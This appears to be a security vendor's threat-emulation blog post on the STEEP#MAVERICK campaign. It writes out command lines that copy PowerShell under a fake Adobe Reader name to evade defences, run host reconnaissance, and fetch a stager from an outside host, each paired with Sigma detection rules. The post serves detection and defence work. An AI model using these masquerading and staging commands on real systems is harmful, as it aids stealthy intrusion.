STEEP#MAVERICK: Rename Adobe

    The next installment of our STEEP#MAVERICK emulation series highlights a defense evasion technique leveraged by the threat actor shortly after initial infection. Similar to many targeted campaigns, initial infection begins with a phishing email containing a malicious attachment. In STEEP#MAVERICK, the email contained a compressed (.zip) file with a shortcut (.lnk) file inside. The shortcut file attempts to hide its execution by calling forfiles.exe.

    Our emulation begins here with a step where the threat actor calls forfiles.exe to copy powershell.exe to C:\Windows and rename it to AdobeAcrobatPDFReader.

    We then use the newly renamed powershell to obtain the name of the domain the device belongs to and if a hypervisor is present. The threat actor did not perform this step in the campaign but we include it here to provide a detection opportunity.

    The following step is where we mimic a C2 connection to hxxps://terma[.]dev/0 to pull down the initial stager. 

    Clean-up steps to remove the renamed powershell.exe file are included after a 3 minute delay.

    Detection Opportunities

    Step Number Request SIGMA Rule(s) Author(s)
    4 run forfiles.exe /c "cmd.exe /c copy C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\AdobeAcrobatPDFReader.exe Creation of an Executable by an Executable frack113
        Indirect Command Execution E.M. Anhaus, oscd.community
        Suspicious Copy From or To System32 Florian Roth, Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (update)
        Suspicious In-Memory Module Execution Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
    5 run C:\windows\AdobeAcrobatPDFReader.exe /c Get-ComputerInfo -Property CsDomain, HyperVisorPresent Highly Relevant Renamed Binary Matthew Green - @mgreen27, Florian Roth
        In-memory PowerShell Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton
        Renamed Binary Matthew Green - @mgreen27, Ecco, James Pemberton / @4A616D6573, oscd.community (improvements), Andreas Hunkeler (@Karneades)
        Renamed PowerShell Florian Roth, frack113
        Suspicious In-Memory Module Execution Perez Diego (@darkquassar), oscd.community, Jonhnathan Ribeiro
    8 upsh --cmd Invoke-Command -ScriptBlock { try { $response = Invoke-WebRequest -Uri https://terma.dev/0 -TimeoutSec 15 } catch { $_.Exception.Response.StatusCode.Value__ } } Alternate PowerShell Hosts Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
        Alternate PowerShell Hosts Pipe Roberto Rodriguez @Cyb3rWard0g, Tim Shelton
        In-memory PowerShell Tom Kern, oscd.community, Natalia Shornikova, Tim Shelton
        Raw Disk Access Using Illegitimate Tools Teymur Kheirkhabarov, oscd.community
        Suspicious WSMAN Provider Image Loads Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)

    This post discusses active research by SCYTHE and other cited third parties into an ongoing threat.  The information in this post should be considered preliminary and may be updated as research continues. This information is provided “as-is” without any warranty or condition of any kind, either express or implied.

    References

    Latest Posts

    Threat Thursday: March
    Threat Thursday: March
    March 21,2024
    Threat Thursday: February
    Threat Thursday: February
    February 22,2024
    Threat Thursday: January
    Threat Thursday: January
    January 18,2024
    Threat Thursday Buzz
    Threat Thursday Buzz
    November 16,2023
    Threat Emulation: APT36
    Threat Emulation: APT36
    July 27,2023

    Related Threat Thursday